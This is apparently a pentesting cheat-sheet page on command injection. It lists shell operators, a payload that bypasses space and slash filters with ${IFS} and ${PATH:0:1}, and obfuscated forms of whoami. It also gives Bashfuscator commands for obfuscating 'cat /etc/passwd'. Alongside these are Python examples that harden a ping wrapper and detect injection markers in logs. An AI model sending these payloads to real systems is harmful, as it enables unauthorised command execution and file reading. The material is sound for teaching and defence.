Programmerboy Pentesting Stuff

Command Injection

Basic Command Injection

;      # semicolon: ends the current command
\n     # newline (URL-encoded as %0a)
&      # run in background, then continue
|      # pipe
&&     # AND (run the next command only if the first succeeds)
||     # OR (run the next command only if the first fails)
``     # sub-shell (backticks)
$()    # sub-shell

Advanced Command Injection

When spaces and paths (/etc/passwd, /, /home) are not allowed

# %0a is a URL-encoded newline: it ends the ping target and starts a new command
# ls lists the directory
# ${IFS} expands to a space when the space character is blacklisted
# ${PATH:0:1} is the first character of $PATH, which is / (PATH starts with an absolute path)

ip=127.0.0.150%0als${IFS}${PATH:0:1}

# Final command becomes

127.0.0.1
ls /
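The bypass above works because a deny-list checks the literal characters of the input, while the shell produces the space and the slash later, from ${IFS} and ${PATH:0:1}. The following is an added example (not code from the original page) that puts the vulnerable pattern, the failing deny-list and the hardened form side by side: the target must parse as an IP address, and the command is built as an argument list with no shell at all. The payload string, the ping wrapper and the function names are constructed for this example.

```python
import ipaddress
import subprocess
from urllib.parse import unquote

# Query-string value modelled on the payload shown above (constructed for this
# example): a newline (%0a) ends the ping target and starts "ls /", with the
# space and the slash supplied by shell expansion instead of literal characters.
PAYLOAD = "127.0.0.1%0als${IFS}${PATH:0:1}"


def vulnerable_command(raw_ip):
    """The pattern that makes injection possible: user input concatenated into
    a command line that is later handed to a shell (os.system, subprocess with
    shell=True). Returned as a string here rather than executed."""
    return "ping -c 1 " + unquote(raw_ip)


def blacklist_filter(raw_ip):
    """Deny-list check that rejects a literal space or slash. Kept only to show
    why it fails: the payload contains neither character, because the shell
    produces them from ${IFS} and ${PATH:0:1} after the check has passed."""
    value = unquote(raw_ip)
    return " " not in value and "/" not in value


def is_valid_ip(raw_ip):
    """Allow-list check: accept the value only if the whole decoded string
    parses as an IP address. Any separator, expansion or trailing text fails."""
    try:
        ipaddress.ip_address(unquote(raw_ip))
        return True
    except ValueError:
        return False


def ping_argv(raw_ip):
    """Build the command as an argument list. With shell=False there is no
    shell to interpret ;, |, newlines, backticks or ${...} expansions, so the
    validated value can only ever be ping's target argument."""
    value = unquote(raw_ip)
    try:
        target = ipaddress.ip_address(value)
    except ValueError:
        raise ValueError("target is not an IP address: %r" % value)
    return ["ping", "-c", "1", str(target)]


def run_ping(raw_ip):
    """Execute the hardened form (hypothetical wrapper). Not called by the demo
    below, so the example runs without sending any packets."""
    return subprocess.run(ping_argv(raw_ip), shell=False,
                          capture_output=True, text=True, timeout=10)


if __name__ == "__main__":
    print("deny-list lets the payload through:", blacklist_filter(PAYLOAD))
    print("a shell would receive:", repr(vulnerable_command(PAYLOAD)))
    print("allow-list accepts the payload:", is_valid_ip(PAYLOAD))
    print("hardened argv for 127.0.0.1:", ping_argv("127.0.0.1"))
```

The design point is that the hardened version never reasons about which characters are dangerous: it describes what a valid value looks like and refuses everything else, and it removes the shell from the call so that there is nothing left to interpret metacharacters even if validation were imperfect.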

Bypassing Blacklists (whoami, pwd, ls, cat)

who$@ami      # $@ expands to nothing, so the shell runs whoami
w`h`o`a`mi    # empty backtick pairs; the number of backticks must be even
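Because command names can be rewritten this way, a detection rule that looks for the words whoami, cat or ls in request parameters misses exactly these attempts. The added example below (not part of the original page) instead keys on the shell syntax listed in the sections above, which cannot be hidden from the shell: separators, sub-shells, ${IFS}, ${PATH:...} and $@. It URL-decodes each query parameter before matching, so %0a and %60 are seen as the newline and backtick they become. The access-log lines are constructed for this example, and the field names are assumptions.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Access-log lines constructed for this example (not real traffic). Lines 2-4
# carry operators and expansions listed on this page; lines 1 and 5 are benign.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2025:10:00:01 +0000] "GET /ping?ip=127.0.0.1 HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2025:10:00:02 +0000] "GET /ping?ip=127.0.0.1%0als${IFS}${PATH:0:1} HTTP/1.1" 200 2048',
    '10.0.0.9 - - [01/Jan/2025:10:00:03 +0000] "GET /ping?ip=127.0.0.1;who$@ami HTTP/1.1" 200 530',
    '10.0.0.9 - - [01/Jan/2025:10:00:04 +0000] "GET /ping?ip=10.0.0.1|w%60h%60o%60a%60mi HTTP/1.1" 200 530',
    '10.0.0.7 - - [01/Jan/2025:10:00:05 +0000] "GET /search?q=cat+videos HTTP/1.1" 200 9000',
]

# Detection keys on shell syntax, not on command names: names can be rewritten
# with $@ or backtick pairs, but the syntax that joins or expands a command cannot.
MARKERS = {
    "separator": re.compile(r"[;&|\n]"),       # ; & | and the %0a newline
    "subshell": re.compile(r"`|\$\("),         # `...` and $(...)
    "ifs_expansion": re.compile(r"\$\{?IFS"),  # ${IFS} / $IFS in place of a space
    "path_slice": re.compile(r"\$\{PATH:"),    # ${PATH:0:1} in place of /
    "empty_param": re.compile(r"\$@"),         # who$@ami -> whoami
}

REQUEST_RE = re.compile(r'"(?:GET|POST|PUT|DELETE) (\S+) HTTP/')


def decoded_params(line):
    """Return the query parameters of one log line, URL-decoded. Pairs are split
    on & before decoding, so a literal & only reaches a value as %26, which
    unquote_plus restores; the same holds for %0a and %60."""
    m = REQUEST_RE.search(line)
    if not m:
        return {}
    params = {}
    for pair in urlsplit(m.group(1)).query.split("&"):
        if not pair:
            continue
        key, _, value = pair.partition("=")
        params[unquote_plus(key)] = unquote_plus(value)
    return params


def classify(value):
    """Names of the marker classes present in one decoded parameter value."""
    return sorted(name for name, rx in MARKERS.items() if rx.search(value))


def scan_log(lines):
    """One finding per (client, parameter) that carries at least one marker."""
    findings = []
    for line in lines:
        client = line.split(" ", 1)[0]
        for name, value in decoded_params(line).items():
            hits = classify(value)
            if hits:
                findings.append({"client": client, "param": name, "hits": hits})
    return findings


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

Run against the sample, the three obfuscated requests are flagged with the classes they use and the two benign ones are not; the search for "cat videos" passes precisely because the rule never looks at words. In production the same classification belongs on the decoded parameters the application actually received, since a WAF or log pipeline that matches on the raw, still-encoded URL misses %0a and %60.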

Automated Obfuscation Tool for Command Injection

BashFuscator

We can use this tool to obfuscate a command:

bashfuscator -c "cat /etc/passwd"

This produces a very large payload; to keep it short, use the following options:

bashfuscator -c 'cat /etc/passwd' -s 1 -t 1 --no-mangling --layers 1

Last updated 1 year ago

GitHub - Bashfuscator/Bashfuscator: A fully configurable and extendable Bash obfuscation framework. This tool is intended to help both red team and blue team.